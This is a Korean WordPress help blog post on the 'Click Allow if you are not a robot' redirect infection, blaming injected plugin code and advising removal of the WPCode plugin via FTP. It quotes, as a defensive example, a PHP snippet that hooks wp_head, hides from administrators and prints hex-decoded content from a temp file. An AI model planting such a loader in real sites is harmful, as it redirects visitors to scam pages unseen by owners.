워드프레스 "로봇이 아니라는 것을 확인하려면 ALLOW를 클릭하세요" 리디렉션 문제

Last Updated: 2024년 09월 04일 2개 댓글

워드프레스 사이트에 방문할 때 "로봇이 아니라는 것을 확인하려면 ALLOW를 클릭하세요 (Click Allow If You Are Not a Robot)" 화면이 표시되고 이상한 사이트로 리디렉션되는 문제가 발생하는 경우가 있습니다. 이러한 리디렉션 문제는 플러그인 등을 통해 악성코드(리디렉션 코드)가 주입되어 나타날 수 있습니다.

워드프레스 "로봇이 아니라는 것을 확인하려면 ALLOW를 클릭하세요" 리디렉션 문제

워드프레스 "로봇이 아니라는 것을 확인하려면 ALLOW를 클릭하세요" 리디렉션 문제

워드프레스 사이트 접속 시 간헐적으로 위의 그림과 같은 그림이 표시되고 이상한 사이트로 이동하는 문제가 발생하는 경우가 있습니다.

이러한 이상 작동과 관련하여 구글링 해보면 컴퓨터가 TotalRecaptcha.top이라는 애드웨어 바이러스에 감염될 때 이러한 현상이 발생한다고 합니다.

애드웨어는 사용자가 특정 소프트웨어를 사용하거나 설치할 때 자동적으로 광고를 보여주는 프로그램을 일컫습니다. 이는 주로 프리웨어에서 흔히 볼 수 있으며, 광고 수익을 통해 운영되기 때문에 모든 애드웨어가 악성 소프트웨어는 아닙니다.

워드프레스 사이트에 이와 같은 현상이 발생한다면 악성코드가 플러그인 등을 통해 주입되었을 수 있습니다.

Redit의 "Issues with my website - "Confirm youre not a robot""에서 이와 같은 문제에 대한 토론이 올라온 것이 있네요.

사이트가 해킹 당한 것 같으니 Wordfence로 스캔을 해보라는 내용인데요. 워드펜스로 스캔해도 아무 것도 발견되지 않았다고 합니다.

보안업체인 Sucuri의 "How to Fix & Remove the “Click Allow If You Are Not a Robot” Redirect"이라는 블로그 글에서도 비슷한 문제가 소개되고 있습니다. 이 글에서는 다음과 같은 코드가 임의의 플러그인에 주입되어 발생하는 문제라고 합니다.

if ((is_admin() || (function_exists('get_hex_cache'))) !== true) {
        add_action('wp_head', 'get_hex_cache', 12);

        function get_hex_cache()
        {
            return print(@hex2bin( '3c7' . (file_get_contents(__DIR__  .'/_inc.tmp'))));
        }
    }

하지만 플러그인과 테마 등에서 의심스러운 악성코드를 스캔하여 치료를 시도해도 문제가 해결되지 않을 수 있습니다.

WPCode – Insert Headers and Footers 플러그인을 통해 악성코드가 주입되는 경우가 많다고 합니다. 이 플러그인을 삭제한 후에 문제가 해결되는지 체크해보시기 바랍니다.

WPCode가 편리하지만 사이트가 해킹을 당하거나 멀웨어에 감염되면서 이 플러그인을 통해 리디렉션 코드(악성코드)가 주입될 수 있고, 최근에 이런 사례가 종종 보고되고 있다고 합니다.

이 문제로 고생하던 분이 FTP에 접속하여 이 플러그인 폴더를 삭제하니 문제가 해결되었다고 하네요.

보안플러그인, 보안툴 다 해봤는데 안잡혀서 찾아보다가 원인찾았네요. 최근 해외사례에 많이 나오는데 WP code Insert Headers and Footers 플러그인 사용하시는 분들 저 같은 멀웨어 현상 있으신 분들은 이 플러그인부터 살펴보세요.

여기에 리디렉션코드(악성멀웨어) 심어져 있었고 이런 사례가 종종 발견된다네요. 이거 FTP로 들어가서 삭제하니까 정상화됬네요ㅠㅠ

파일질라 등을 사용하여 FTP/SFTP에 접속하여 플러그인 폴더를 삭제할 수 있습니다. 이 플러그인의 경로는 /wp-content/plugins/inserte-headers-and-footers입니다.

이 조치에도 리디렉션 문제가 해결되지 않으면 여기에서 서비스(유료)를 의뢰하실 수 있습니다.

마치며

사이트가 멀웨어에 감염되어 방문하는 사용자들이 이상한 스팸 사이트로 이동하게 되면 사이트 평판에 영향을 미칠 수 있고 경우에 따라 구글 크롬에서 위험한 사이트로 분류하여 차단될 수도 있습니다.

요즘 나오는 멀웨어는 관리자로 접속할 때에는 아무런 증상이 없고 비로그인 사용자들에게만 증상이 나타나기도 합니다. 이 때문에 관리자가 너무 늦게 사이트 문제를 인지하여 쉽게 해결할 수 있는 문제를 시간을 놓쳐 힘들게 해결해야 하는 경우도 있습니다.

이 글에서 소개하는 멀웨어의 경우 간헐적을 증상이 나타날 수 있습니다. 그래서 조치를 취한 후에 문제가 해결되었는지 체크하는 데 시간이 걸릴 수 있습니다.

참고


2 개 댓글

Leave a Comment

  1. 우와 감사합니다. 이 문제 때문에 몇달 동안 고통 받고 있었는데 이런 정보를 공유해주셔서 감사합니다. 한번 시도해보고 문제가 해결되지 않은 유료 서비스를 의뢰하겠습니다.

    응답
    • 악성코드 문제가 잘 해결되기를 바랍니다. 궁금한 점이 있으시면 아래 댓글란이나 네이버 카페를 통해 문의주시면 아는 범위 내에서 답변드리도록 노력하겠습니다.😄

      응답
10s
할인 소식
클라우드웨이즈 여름 세일!
- 4개월간 30% 할인 - 10개 사이트 무료 이전
(9월 9일까지)
Limited Time Offer
You This Coupon Code in Checkout
Click the code to Copy